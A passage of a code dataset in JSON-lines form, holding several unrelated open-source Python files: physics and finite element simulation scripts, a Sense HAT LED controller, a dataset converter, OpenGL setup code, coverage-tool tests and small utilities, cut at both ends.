lastGoodPeakI = len(peaksI) - 1 # Set to last peak\n firstBadPeak = lastGoodPeakI # Assuming it gets worse after this\n else:\n lastGoodPeakI = risePeaksIndices[0] # Set to last non negative peak\n firstBadPeak = lastGoodPeakI+1\n #print(\"lastGoodPeakI\", lastGoodPeakI)\n\n # Line fit for good peaks ; just here for debug visualisation; can comment out\n fitLineGoodPeaks = np.polyfit(s.t[peaksI[:lastGoodPeakI+1]], np.log(s.firstharmonic[peaksI[:lastGoodPeakI+1]]), 1) # taking log of peaks, and doing a line fit\n fitLineGoodPeaksF = np.poly1d(fitLineGoodPeaks) # Create a fit function from the polyfit\n fit_Rsq = r_squared(s.firstharmonic[peaksI[:lastGoodPeakI+1]], np.exp(fitLineGoodPeaksF(s.t[peaksI[:lastGoodPeakI+1]]))) # Find R^2\n\n # Frequency estimate, # can comment out when not needed\n peakTimeDiffs = np.ediff1d(s.t[peaksI])\n if lastGoodPeakI > 0: # At least two valid peaks to calc frequency\n oscFrequency = np.append(oscFrequency, np.pi/peakTimeDiffs[0:lastGoodPeakI])\n # print(oscFrequency)\n # validPeakTimeDiffs = peakTimeDiffs[0:lastGoodPeakI]\n # for timeDiff in validPeakTimeDiffs:\n # oscFrequency = np.append(oscFrequency, 1/timeDiff)\n\n # Peaks collation for fit outside of loop; # can comment out when not needed\n if lastGoodPeakI > 0: # At least two valid peaks to calc frequency\n goodPeakAmplitudes = np.append(goodPeakAmplitudes, s.firstharmonic[peaksI[0:lastGoodPeakI+1]])\n goodPeakTimes = np.append(goodPeakTimes, s.t[peaksI[0:lastGoodPeakI+1]])\n #print(\"s.firstharmonic[peaksI[0:lastGoodPeakI+1]]: \", s.firstharmonic[peaksI[0:lastGoodPeakI+1]])\n #print(\"g2oodPeakAmplitudes\", goodPeakAmplitudes)\n\n\n # Results\n noiseLevelThreshold = s.firstharmonic[peaksI[firstBadPeak]] # 3-d array format\n #print(\"Noise Level Amplitude Threshold for \", L, \"L; \", npart, \"nparts; \", ncells, \"ncells is: \", noiseLevelThreshold)\n \n # Results in 1d arrays\n rsiR = np.append(rsiR, i0)\n npartR = np.append(npartR, npart)\n ncellsR = np.append(ncellsR, ncells)\n LR = np.append(LR, L)\n noiseLevelThresholdR = np.append(noiseLevelThresholdR, noiseLevelThreshold)\n timeR = np.append(timeR, timeStop-timeStart)\n \n\n #plt.close(\"all\")\n plt.plot(s.t[peaksI[:lastGoodPeakI+1]],np.exp(fitLineGoodPeaksF(s.t[peaksI[:lastGoodPeakI+1]])), linestyle='dashed', label=r\"Fit Line for low noise data\", c = c)\n\n\n # Show plot\n if PLOTS:\n plt.legend()\n plt.show()\n\n \n print(noiseLevelThreshold)\n\n # Function calls for individual tasks (Will be commented out where not applicable)\n # task1_noiseAmplitude(noiseLevelThresholdR, L, ncells, npart) \n # task1_noiseAmplitudeCells(noiseLevelThresholdR, L, ncellsR, npart, samples)\n # task1_noiseAmplitudeParticles(noiseLevelThresholdR, L, ncells, npartR, samples)\n # task1_computationalTime(noiseLevelThresholdR, L, ncellsR, npartR, samples, timeR)\n oscFreqMean, oscFreqSe = task2_peakFrequency(L, ncells, npart, samples, oscFrequency)\n decayRateMean, decayRateSe = task2_globalPeakFit(L, ncells, npart, samples, goodPeakAmplitudes, goodPeakTimes, oscFreqMean, oscFreqSe)\n #task2_BoxCompare = (L, ncells, npart, samples, goodPeakAmplitudes, goodPeakTimes, oscFreqMean, oscFreqSe)\n\n \n \n # plot \n #plt.plot(s.t, s.firstharmonic, label=r\"First harmonic amplitude [Normalised]\")\n plt.xlabel(\"Number of Particles\")\n plt.ylabel(\"Number of Cells\")\n plt.title(\"Landau Damping Amplitude Noise Threshold vs Particle and Cell Number\")\n plt.scatter(npartR, npartR, s=noiseLevelThresholdR)\n\n\n\n\n","repo_name":"mehfoos/Nuclear-Fusion","sub_path":"CompuLab/epcRun_2.py","file_name":"epcRun_2.py","file_ext":"py","file_size_in_byte":16126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19092859216","text":"#!/usr/bin/python\n\nimport time\nfrom sense_hat import SenseHat\n\ns = SenseHat()\ns.low_light = True\ngreen = (0, 255, 0)\nyellow = (255, 255, 0)\nblue = (0, 0, 255)\nred = (255, 0, 0)\nwhite = (255, 255, 255)\nnothing = (0, 0, 0)\ncolors = [nothing, green, yellow, red]\nmax = len(colors) - 1\ncurrent = 1\nprev = 0\noff = 0\n\n\ndef init():\n W = white\n B = blue\n O = nothing\n logo = (\n O, O, O, O, O, O, O, O,\n O, O, O, O, O, O, O, O,\n W, W, W, B, O, O, O, B,\n W, O, W, B, O, O, O, B,\n W, W, W, B, O, B, O, B,\n W, O, W, O, B, O, B, O,\n O, O, O, O, O, O, O, O,\n O, O, O, O, O, O, O, O,\n )\n return logo\n\n\ndef color(pos=0):\n global current\n\n if pos > 0:\n global prev\n prev = current\n\n current = pos\n return colors[current] * 64\n\n\ntry:\n s.set_pixels(init())\n time.sleep(1)\n s.set_pixels(color(1))\n\n while True:\n for event in s.stick.get_events():\n if event.action == 'released':\n if event.direction == 'middle':\n off ^= 1\n s.set_pixels(color(0 if off == 1 else prev))\n elif off == 0:\n current = current + 1 if event.direction == 'up' else current - 1\n current = max if current < 1 else 1 if current > max else current\n s.set_pixels(color(current))\n\nexcept KeyboardInterrupt:\n s.set_pixels(color(0))\n","repo_name":"avoidwork/sensehat","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15265659023","text":"\"\"\"\nWrite a program that takes an integer input from the user and determines if it is even or not. \nThe program should print 'Even' if the number is even, and 'Odd' if the number is odd\n\"\"\"\ndef determineEvenOdd(number):\n if number%2 == 0:\n print(str(number) + \" is even\")\n else:\n print(str(number) + \" is odd\")\n\nnumber = int(input(\"Enter a number: \"))\ndetermineEvenOdd(number)","repo_name":"abhitatachar2000/Python101","sub_path":"Topic 1 - Numbers and Arithmetic/evenOdd.py","file_name":"evenOdd.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73374720374","text":"# https://github.com/avadesh02/MangoNet-Semantic-Dataset\n\nimport os\nimport shutil\nfrom urllib.parse import unquote, urlparse\n\nimport numpy as np\nimport supervisely as sly\nfrom cv2 import connectedComponents\nfrom dataset_tools.convert import unpack_if_archive\nfrom dotenv import load_dotenv\nfrom supervisely.io.fs import get_file_name, get_file_size\nfrom tqdm import tqdm\n\nimport src.settings as s\n\n\ndef fix_masks(image_np: np.ndarray) -> np.ndarray:\n lower_bound = np.array([70, 110, 0])\n upper_bound = np.array([255, 255, 255])\n condition_white = np.logical_and(\n np.all(image_np >= lower_bound, axis=2), np.all(image_np <= upper_bound, axis=2)\n )\n\n lower_bound = np.array([0, 0, 0])\n upper_bound = np.array([20, 20, 20])\n condition_black = np.logical_and(\n np.all(image_np >= lower_bound, axis=2), np.all(image_np <= upper_bound, axis=2)\n )\n\n image_np[np.where(condition_white)] = (255, 255, 255)\n image_np[np.where(condition_black)] = (0, 0, 0)\n\n return image_np\n\ndef count_files(path, extension):\n count = 0\n for root, dirs, files in os.walk(path):\n for file in files:\n if file.endswith(extension):\n count += 1\n return count\n \ndef convert_and_upload_supervisely_project(\n api: sly.Api, workspace_id: int, project_name: str\n) -> sly.ProjectInfo:\n\n # project_name = \"MangoNet\"\n dataset_path = \"/home/grokhi/rawdata/MangoNet-Semantic-Dataset/MangoNet Dataset\"\n ds_name = \"ds\"\n batch_size = 3\n images_folder_name = \"original images\"\n masks_folder_name = \"annotated images\"\n masks_ext = \".jpg\"\n masks_prefix = \"Class_\"\n\n\n def create_ann(image_path):\n labels = []\n\n image_name = get_file_name(image_path)[5:]\n mask_name = masks_prefix + image_name + masks_ext\n mask_path = os.path.join(masks_pathes, mask_name)\n ann_np = sly.imaging.image.read(mask_path)[:, :, :]\n ann_np = fix_masks(ann_np)[:, :, 0]\n img_height = ann_np.shape[0]\n img_wight = ann_np.shape[1]\n mask = ann_np != 0\n ret, curr_mask = connectedComponents(mask.astype(\"uint8\"), connectivity=8)\n for i in range(1, ret):\n obj_mask = curr_mask == i\n curr_bitmap = sly.Bitmap(obj_mask)\n if curr_bitmap.area > 100:\n curr_label = sly.Label(curr_bitmap, obj_class)\n labels.append(curr_label)\n\n return sly.Annotation(img_size=(img_height, img_wight), labels=labels)\n\n\n obj_class = sly.ObjClass(\"mango\", sly.Bitmap)\n\n project = api.project.create(workspace_id, project_name, change_name_if_conflict=True)\n meta = sly.ProjectMeta(obj_classes=[obj_class])\n api.project.update_meta(project.id, meta.to_json())\n\n for ds_name in os.listdir(dataset_path):\n dataset = api.dataset.create(project.id, ds_name, change_name_if_conflict=True)\n\n curr_ds_path = os.path.join(dataset_path, ds_name)\n\n images_pathes = os.path.join(curr_ds_path, images_folder_name)\n masks_pathes = os.path.join(curr_ds_path, masks_folder_name)\n images_names = os.listdir(images_pathes)\n\n progress = sly.Progress(\"Create dataset {}\".format(ds_name), len(images_names))\n\n for img_names_batch in sly.batched(images_names, batch_size=batch_size):\n images_pathes_batch = [\n os.path.join(images_pathes, image_path) for image_path in img_names_batch\n ]\n\n anns_batch = [create_ann(image_path) for image_path in images_pathes_batch]\n\n img_infos = api.image.upload_paths(dataset.id, img_names_batch, images_pathes_batch)\n img_ids = [im_info.id for im_info in img_infos]\n\n api.annotation.upload_anns(img_ids, anns_batch)\n\n progress.iters_done_report(len(img_names_batch))\n return project\n\n\n","repo_name":"dataset-ninja/mangonet-semantic-dataset","sub_path":"src/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":3825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18844749753","text":"from glfw.GLFW import *\r\nimport OpenGL.GL as gl\r\nfrom sys import stderr\r\nimport numpy as np\r\nimport util\r\nimport graphics.shader as shader\r\nimport ctypes\r\nfrom PIL import Image\r\nimport random as rand\r\nimport graphics.computeShader as comp\r\n\r\n# fmt: off\r\n# vertex -> x, y, z, u, v\r\nvertices = [\r\n -1, 1, 0, 0, 1, # top-left\r\n 1, 1, 0, 1, 1, # top-right\r\n 1, -1, 0, 1, 0, # bottom-right\r\n -1, -1, 0, 0, 0, # bottom-left\r\n]\r\n\r\nindices = [0, 1, 3, \r\n 1, 2, 3] # upper triangle # lower triangle\r\n# fmt: on\r\n\r\n\r\ndef initRenderCavas(self):\r\n floatSize = 4\r\n int32Size = 4\r\n\r\n # setup buffers\r\n self.sceneRenderer.vao = gl.glGenVertexArrays(1)\r\n self.sceneRenderer.vbo = gl.glGenBuffers(1)\r\n self.sceneRenderer.ebo = gl.glGenBuffers(1)\r\n\r\n gl.glBindVertexArray(self.sceneRenderer.vao)\r\n\r\n gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.sceneRenderer.vbo)\r\n gl.glBufferData(\r\n gl.GL_ARRAY_BUFFER,\r\n len(vertices) * floatSize,\r\n np.array(vertices, dtype=\"float32\"),\r\n gl.GL_STATIC_DRAW,\r\n )\r\n\r\n gl.glBindBuffer(gl.GL_ELEMENT_ARRAY_BUFFER, self.sceneRenderer.ebo)\r\n gl.glBufferData(\r\n gl.GL_ELEMENT_ARRAY_BUFFER,\r\n len(indices) * int32Size,\r\n np.array(indices, dtype=\"uint32\"),\r\n gl.GL_STATIC_DRAW,\r\n )\r\n\r\n gl.glVertexAttribPointer(0, 3, gl.GL_FLOAT, gl.GL_FALSE, 5 * floatSize, None)\r\n gl.glVertexAttribPointer(\r\n 1, 2, gl.GL_FLOAT, gl.GL_FALSE, 5 * floatSize, ctypes.c_void_p(3 * floatSize)\r\n )\r\n gl.glEnableVertexAttribArray(0)\r\n gl.glEnableVertexAttribArray(1)\r\n\r\n gl.glBindVertexArray(self.sceneRenderer.vao)\r\n\r\n # Shader for quad\r\n self.sceneRenderer.shaderProgram = shader.generateShaderProgram(\r\n \"./src/shader_code/vertex.vert\", \"./src/shader_code/fragment.frag\"\r\n )\r\n\r\n shader.useShader(self.sceneRenderer.shaderProgram)\r\n\r\n self.sceneRenderer.tex = gl.glGenTextures(1)\r\n gl.glActiveTexture(gl.GL_TEXTURE0)\r\n gl.glBindTexture(gl.GL_TEXTURE_2D, self.sceneRenderer.tex)\r\n # gl.glUniform1i(gl.glGetUniformLocation(shaderProgram, \"ourTex\"), 0)\r\n\r\n gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_MAG_FILTER, gl.GL_NEAREST)\r\n gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_MIN_FILTER, gl.GL_LINEAR)\r\n\r\n viewport = gl.glGetIntegerv(gl.GL_VIEWPORT)\r\n width = viewport[2]\r\n height = viewport[3]\r\n\r\n gl.glTexImage2D(\r\n gl.GL_TEXTURE_2D,\r\n 0,\r\n gl.GL_RGBA32F,\r\n self.resolution[0],\r\n self.resolution[1],\r\n 0,\r\n gl.GL_RGBA,\r\n gl.GL_FLOAT,\r\n None,\r\n )\r\n # gl.glTexImage2D(gl.GL_TEXTURE_2D, 0, gl.GL_RGB, 1920, 1080, 0, gl.GL_RGB, gl.GL_UNSIGNED_BYTE, data)\r\n\r\n gl.glBindImageTexture(\r\n 0, self.sceneRenderer.tex, 0, gl.GL_FALSE, 0, gl.GL_WRITE_ONLY, gl.GL_RGBA32F\r\n )\r\n\r\n # init compute shader\r\n self.sceneRenderer.compute = comp.compileComputeShader(\"./src/shader_code/raytracer.comp\")\r\n # self.compute = comp.compileComputeShader(\"./src/shader_code/mandelbrot.comp\")\r\n\r\n\r\ndef resizeTexture(self):\r\n\r\n gl.glActiveTexture(gl.GL_TEXTURE0)\r\n gl.glBindTexture(gl.GL_TEXTURE_2D, self.sceneRenderer.tex)\r\n\r\n\r\n gl.glTexImage2D(\r\n gl.GL_TEXTURE_2D,\r\n 0,\r\n gl.GL_RGBA32F,\r\n self.resolution[0],\r\n self.resolution[1],\r\n 0,\r\n gl.GL_RGBA,\r\n gl.GL_FLOAT,\r\n None,\r\n )\r\n","repo_name":"RandomPigYT/raytracer","sub_path":"src/core/canvas.py","file_name":"canvas.py","file_ext":"py","file_size_in_byte":3406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30596340245","text":"import json\nimport unicodedata\n\n\ndef read_info(json_path):\n items = [json.loads(line) for line in open(json_path).readlines()]\n ret = {}\n for item in items:\n item_id = item[\"item_id\"]\n ret[item_id] = item\n return ret\n\n\ndef read_pair(json_path):\n items = [json.loads(line) for line in open(json_path).readlines()]\n return items\n\n\ndef clean_str(s):\n # https://blog.csdn.net/Owen_goodman/article/details/107783304\n return unicodedata.normalize(\"NFKC\", s.replace(\"#\", \"\").lower())\n\n\ndef str2dict(s):\n d = {}\n s_split = s.split(\";\")\n for sub_str in s_split:\n sub_str_split = sub_str.split(\":\")\n p = sub_str_split[0]\n v = \":\".join(sub_str_split[1:])\n if p not in d:\n d[p] = set()\n d[p].add(v)\n for k in d:\n d[k] = \",\".join(d[k])\n return d\n","repo_name":"hanchenchen/CCKS2022-track2-solution","sub_path":"src/data/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"25709745334","text":"##########################################################################################\n# import necessary modules (list of all simulation running modules)\n##########################################################################################\nimport os\nfrom fenics import *\nfrom dolfin import *\nfrom mshr import *\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nimport time\nstart_time = time.time()\n##########################################################################################\n# input info / get input file imported \n##########################################################################################\n# https://fenicsproject.org/pub/tutorial/html/._ftut1017.html\n##########################################################################################\nnum = int(sys.argv[1]) # command line argument indicates the bitmap to use\n\nis_train = int(sys.argv[2]) == 1 # indicates if it's test or train \n\nmref = 4 #int(sys.argv[2]) # indicates mesh size -- can set up as command line arg as needed\n\nif is_train:\n fname = 'train_data_' + str(num)\nelse:\n fname = 'test_data_' + str(num)\n \n \nfolder_name = 'folder' + '_' + fname + '_' + 'mesh' + str(mref) # output folder \nif not os.path.exists(folder_name):\n os.makedirs(folder_name)\n\n# --> import input bitmap\ninput_folder = '../sample_data' # location of the bitmaps -- may have to update\n\nif is_train:\n line = np.loadtxt(input_folder + '/mnist_img_train.txt')[num,:] # <--MNIST data\nelse:\n line = np.loadtxt(input_folder + '/mnist_img_test.txt')[num,:]\n\ndata_import = line.reshape((28,28))\n\n# --> for laptop data_import = np.loadtxt('input_data/train_data_%i.txt'%(num))\n\n# --> flip input bitmap \ndata = np.zeros(data_import.shape)\nfor jj in range(0,data.shape[0]):\n\tfor kk in range(0,data.shape[1]):\n\t\tdata[jj,kk] = data_import[int(27.0 - kk),jj] #jj is columns of input, kk is rows\n\n##########################################################################################\n# compliler settings / optimization options \n##########################################################################################\nparameters[\"form_compiler\"][\"cpp_optimize\"] = True\nparameters[\"form_compiler\"][\"representation\"] = \"uflacs\"\nparameters[\"form_compiler\"][\"quadrature_degree\"] = 2 #TODO 2\nparameters['form_compiler'].add('eliminate_zeros', False)\n\n##########################################################################################\n# problem geometry \n##########################################################################################\np_1_x = 0.0; p_1_y = 0.0; p_1_z = 0.0 \np_2_x = 28.0; p_2_y = 28.0; p_2_z = 4.0\nnx = int(7*mref) #nx = int(28*mref)\nny = int(7*mref)#ny = int(28*mref)\nnz = int(mref) \n##########################################################################################\n# mesh and function spaces \n##########################################################################################\nmesh = BoxMesh(Point(p_1_x,p_1_y,p_1_z),Point(p_2_x,p_2_y,p_2_z),nx,ny,nz)\n\n##########################################################################################\n# mesh and material prop\n##########################################################################################\nP2 = VectorElement(\"Lagrange\", mesh.ufl_cell(), 2) #TODO 2\nTH = P2\nW = FunctionSpace(mesh, TH)\nV = FunctionSpace(mesh, 'CG', 1)\nback = 1.0\nhigh = 100.0 \nnu = 0.3\nmaterial_parameters = {'back':back, 'high':high, 'nu':nu}\n\ndef bitmap(x,y): #there could be a much better way to do this, but this is working within the confines of ufl\n\ttotal = 0 \n\tfor jj in range(0,data.shape[0]):\n\t\tfor kk in range(0,data.shape[1]):\n\t\t\tconst1 = conditional(x>=jj,1,0) # x is rows\n\t\t\tconst2 = conditional(x=kk,1,0) # y is columns \n\t\t\tconst4 = conditional(y3,1,0) #ufl equality is not working, would like to make it sum == 4 \n\t\t\ttotal += const*data[jj,kk]\n\treturn total\n\nclass GetMat:\n\tdef __init__(self,material_parameters,mesh):\n\t\tmp = material_parameters\n\t\tself.mesh = mesh\n\t\tself.back = mp['back']\n\t\tself.high = mp['high']\n\t\tself.nu = mp['nu']\n\tdef getFunctionMaterials(self, V):\n\t\tself.x = SpatialCoordinate(self.mesh)\n\t\tval = bitmap(self.x[0],self.x[1])\n\t\tE = val/255.0*(self.high-self.back) + self.back\n\t\teffectiveMdata = {'E':E, 'nu':self.nu}\n\t\treturn effectiveMdata\n\nmat = GetMat(material_parameters, mesh)\nEmatData = mat.getFunctionMaterials(V)\nE = EmatData['E']\nnu = EmatData['nu']\nlmbda, mu = (E*nu/((1.0 + nu )*(1.0-2.0*nu))) , (E/(2*(1+nu)))\nmatdomain = MeshFunction('size_t',mesh,mesh.topology().dim())\ndx = Measure('dx',domain=mesh, subdomain_data=matdomain)\n\n##########################################################################################\n# define boundary domains \n##########################################################################################\nbtm = CompiledSubDomain(\"near(x[1], btmCoord)\", btmCoord = p_1_y)\nbtmBC = DirichletBC(W, Constant((0.0,0.0,0.0)), btm)\n\n##########################################################################################\n# apply traction, and body forces (boundary conditions are within the solver b/c they update)\n##########################################################################################\nT = Constant((0.0, 0.0, 0.0)) # Traction force on the boundary\nB = Constant((0.0, 0.0, 0.0))\n\n##########################################################################################\n# define finite element problem \n##########################################################################################\nu = Function(W)\ndu = TrialFunction(W)\nv = TestFunction(W)\n\n##########################################################################################\n# solver loop\n##########################################################################################\ndef problem_solve(th, stretch, u,du,v):\t\n\texpr = Expression(( \" cos(th)*(x[0]-L0) - sin(th)*(x[2]-L2) - (x[0]-L0) \" , \"stretch\" , \" sin(th)*(x[0]-L0) + cos(th)*(x[2]-L2) - (x[2]-L2)\"), th=th, L0=p_2_x/2.0, L2= p_2_z/2.0 , stretch=stretch,degree=2)\n\n\t# Updated boundary conditions \n\ttop = CompiledSubDomain(\"near(x[1], topCoord)\", topCoord = p_2_y)\n\ttopBC = DirichletBC(W, expr, top)\n\tbcs = [btmBC,topBC]\n\n\t# Kinematics\n\td = len(u)\n\tI = Identity(d) # Identity tensor\n\tF = I + grad(u) # Deformation gradient\n\tF = variable(F)\n\tpsi = 1/2*mu*( inner(F,F) - 3 - 2*ln(det(F)) ) + 1/2*lmbda*(1/2*(det(F)**2 - 1) - ln(det(F)))\n\tf_int = derivative(psi*dx,u,v)\n\tf_ext = derivative( dot(B, u)*dx('everywhere') + dot(T, u)*ds , u, v)\n\tFboth = f_int - f_ext \n\t# Tangent \n\tdF = derivative(Fboth, u, du)\n\t#solve(Fboth == 0, u, bcs, J=dF)\n\t\n\t# --> alternative solver configuration required for larger meshes \n\tproblem = NonlinearVariationalProblem(Fboth, u, bcs, dF)\n\tsolver = NonlinearVariationalSolver(problem)\n\tprm = solver.parameters\n \t# Solver parameters\n\tprm['newton_solver']['linear_solver'] = 'cg'\n\t# Solve variational problem\n\tsolver.solve()\n\t\n\treturn u, du, v, f_int, f_ext, psi \n\n##########################################################################################\n# post processing functions \n##########################################################################################\nto_print = True\n##########################################################################################\ndef rxn_forces(list_rxn,W,f_int,f_ext):\n\tx_dofs = W.sub(0).dofmap().dofs()\n\ty_dofs = W.sub(1).dofmap().dofs()\n\tz_dofs = W.sub(2).dofmap().dofs() # added for 3D\n\tf_ext_known = assemble(f_ext)\n\tf_ext_unknown = assemble(f_int) - f_ext_known\n\tdof_coords = W.tabulate_dof_coordinates().reshape((-1, 3)) # changed from 2 to 3 for 3D\n\ty_val_min = np.min(dof_coords[:,1]) + 10E-5; y_val_max = np.max(dof_coords[:,1]) - 10E-5\n\tx_top = []; x_btm = [] \n\tfor kk in x_dofs:\n\t\tif dof_coords[kk,1] > y_val_max:\n\t\t\tx_top.append(kk)\n\t\tif dof_coords[kk,1] < y_val_min:\n\t\t\tx_btm.append(kk)\n\tf_sum_top_x = np.sum(f_ext_unknown[x_top])\n\tf_sum_btm_x = np.sum(f_ext_unknown[x_btm])\t\t\n\ty_top = []; y_btm = [] \n\tfor kk in y_dofs:\n\t\tif dof_coords[kk,1] > y_val_max:\n\t\t\ty_top.append(kk)\n\t\tif dof_coords[kk,1] < y_val_min:\n\t\t\ty_btm.append(kk)\n\tf_sum_top_y = np.sum(f_ext_unknown[y_top])\n\tf_sum_btm_y = np.sum(f_ext_unknown[y_btm])\t\n\tz_top = []; z_btm = [] # added for 3D\n\tfor kk in z_dofs:\n\t\tif dof_coords[kk,1] > y_val_max:\n\t\t\tz_top.append(kk)\n\t\tif dof_coords[kk,1] < y_val_min:\n\t\t\tz_btm.append(kk)\n\tf_sum_top_z = np.sum(f_ext_unknown[z_top])\n\tf_sum_btm_z = np.sum(f_ext_unknown[z_btm])\n\tif to_print: \n\t\tprint(\"x_top, x_btm rxn force:\", f_sum_top_x, f_sum_btm_x)\n\t\tprint(\"y_top, y_btm rxn force:\", f_sum_top_y, f_sum_btm_y)\n\t\tprint(\"z_top, z_btm rxn force:\", f_sum_top_z, f_sum_btm_z)\n\tlist_rxn.append([f_sum_top_x,f_sum_btm_x,f_sum_top_y,f_sum_btm_y,f_sum_top_z,f_sum_btm_z])\n\treturn list_rxn\n\ndef pix_centers(u):\n\tdisps_all_x = np.zeros((28,28))\n\tdisps_all_y = np.zeros((28,28))\n\tdisps_all_z = np.zeros((28,28))\n\tfor kk in range(0,28):\n\t\tfor jj in range(0,28):\n\t\t\txx = jj + 0.5 # x is columns\n\t\t\tyy = kk + 0.5 # y is rows \n\t\t\tzz = p_2_z / 2.0\n\t\t\tdisps_all_x[kk,jj] = u(xx,yy,zz)[0]\n\t\t\tdisps_all_y[kk,jj] = u(xx,yy,zz)[1]\n\t\t\tdisps_all_z[kk,jj] = u(xx,yy,zz)[2]\n\t\n\treturn disps_all_x, disps_all_y, disps_all_z\n\ndef strain_energy(list_psi, psi):\n\tval = assemble(psi*dx)\n\tlist_psi.append(val)\n\treturn list_psi\n\ndef strain_energy_subtract_first(list_psi):\n\tfirst = list_psi[0]\n\tfor kk in range(0,len(list_psi)):\n\t\tlist_psi[kk] = list_psi[kk] - first \n\treturn list_psi\n##########################################################################################\n##########################################################################################\n#fname_paraview = File(folder_name + '/disp.pvd') #<-- primarily for debugging \n\nlist_rxn = []\n\nlist_psi = [] \n\n# --> run the loop\nth_val = [0.0, 0.001, 0.01]\nstr_val = [0.0,0.25/(pi/128)*0.001,0.25/(pi/128)*0.01]\n\nfor kk in range(1,17):\n\tth_val.append(pi/128.0*kk)\n\tstr_val.append(.25*kk)\n\nfname = folder_name + '/pixel_disp' \n\nfor step in range(0,len(th_val)):\n\tth = th_val[step]\n\tstretch = str_val[step]\n\tu, du, v, f_int, f_ext, psi = problem_solve(th,stretch, u,du,v)\n\tlist_rxn = rxn_forces(list_rxn,W,f_int,f_ext)\n\t#fname_paraview << (u,step)\n\tdisps_all_x, disps_all_y, disps_all_z = pix_centers(u)\n\tfn_x = fname + '_step' + str(step) + '_x.txt'\n\tfn_y = fname + '_step' + str(step) + '_y.txt'\n\tfn_z = fname + '_step' + str(step) + '_z.txt'\n\tnp.savetxt(fn_x,disps_all_x)\n\tnp.savetxt(fn_y,disps_all_y)\n\tnp.savetxt(fn_z,disps_all_z)\n\tlist_psi = strain_energy(list_psi, psi)\n\n# --> save reaction forces\nfname = folder_name + '/rxn_force.txt'\nnp.savetxt(fname,np.asarray(list_rxn))\n\n# --> save total (delta) potential energy \nfname = folder_name + '/strain_energy.txt'\nlist_psi = strain_energy_subtract_first(list_psi)\nnp.savetxt(fname, np.asarray(list_psi))\t\n\nend_time = time.time()\n\nfull_time = end_time - start_time\n\nprint('time:')\nprint(full_time)\n\t\n\t\n\t\n\t\n\t\n\t\n\n","repo_name":"elejeune11/Mechanical-MNIST-Transfer-Learning","sub_path":"generate_dataset/run_FEA_simulation_3D_UE_twist.py","file_name":"run_FEA_simulation_3D_UE_twist.py","file_ext":"py","file_size_in_byte":11015,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"70942206453","text":"import json\nimport mock\nimport os\n\nfrom coverage.control import Coverage\n\nfrom smother.control import get_smother_filename # nopep8\nfrom smother.control import Smother\nfrom smother.tests.utils import tempdir\n\n\ndef test_append():\n a = {\n 'test1': {'a': [1]},\n }\n\n b = {\n 'test1': {'a': [2]},\n 'test2': {'a': [3]}\n }\n\n combine = {\n 'test1': {'a': [1, 2]},\n 'test2': {'a': [3]},\n }\n\n with tempdir() as base:\n outpath = os.path.join(base, '.smother')\n\n smother = Smother()\n smother.data = a\n smother.write(outpath, append=True)\n\n smother = Smother()\n smother.data = b\n smother.write(outpath, append=True)\n\n assert Smother.load(outpath).data == combine\n\n\ndef test_write_coverage():\n\n a = {\n 'test1': {'a': [1]},\n 'test2': {'a': [2]},\n }\n\n expected = {'lines': {os.path.abspath('a'): [1, 2]}}\n\n with tempdir() as base:\n path = os.path.join(base, '.coverage')\n\n cov = Coverage(data_file=path)\n\n smother = Smother(cov)\n smother.data = a\n smother.write_coverage()\n\n header_len = 63\n with open(path) as infile:\n infile.seek(header_len)\n result = json.load(infile)\n\n assert result == expected\n\n\ndef test_iter_records_semantic():\n\n # Default coverage behavior is to emit absolute file paths.\n smother = Smother()\n smother.data = {\n 'test1': {os.path.abspath('smother/tests/demo.py'): [8]}\n }\n\n expected = [('smother.tests.demo:foo', 'test1')]\n assert list(smother.iter_records(semantic=True)) == expected\n\n\n@mock.patch('smother.control.random')\n@mock.patch('smother.control.socket')\n@mock.patch('smother.control.os')\ndef test_parallel_mode_suffix(mock_os, mock_socket, mock_random):\n fake_pid = 12345\n fake_hostname = \"the_host\"\n fake_random_int = 99999\n mock_os.getpid.return_value = fake_pid\n mock_socket.gethostname.return_value = fake_hostname\n mock_random.randint.return_value = fake_random_int\n\n base_name = \".smother\"\n fake_suffix = \"the_host.12345.099999\"\n assert get_smother_filename(base_name, False) == base_name\n assert (\n get_smother_filename(base_name, True) == base_name + \".\" + fake_suffix)\n\n\ndef test_convert_to_relative_paths():\n smother = Smother()\n smother.data = {\n 'test1': {os.path.abspath('smother/tests/demo.py'): [8]}\n }\n\n expected_data = {\n 'test1': {'smother/tests/demo.py': [8]}\n }\n\n assert Smother.convert_to_relative_paths(smother).data == expected_data\n","repo_name":"ChrisBeaumont/smother","sub_path":"smother/tests/test_controller.py","file_name":"test_controller.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"21"} +{"seq_id":"32472069083","text":"from .mc_db import McDb\nfrom kasasa_common.database.connection import Connection\n\n\nclass FiMarketingCloud(McDb):\n \n def __init__(self, connection: Connection = None):\n super(FiMarketingCloud, self).__init__(connection)\n self._table = 'sfmc_product_master'\n self._table_fields_map = {\n \"salesforce_product_id\": \"AcctProdIDFull__c\",\n \"fi_crm_record_id\": \"AcctProductExternalID__c\",\n \"product_type\": \"Product Class\",\n \"product_name\": \"Product__c\",\n \"krp_base_product_id\": \"BillingKrpPid__c\",\n \"market_this_product\": \"Market_This_Product\",\n \"product_priority\": \"Product_Priority\",\n \"opt_in_status\": \"Opt-In_Status\"\n }\n \n def validate(self, set_of_values):\n return 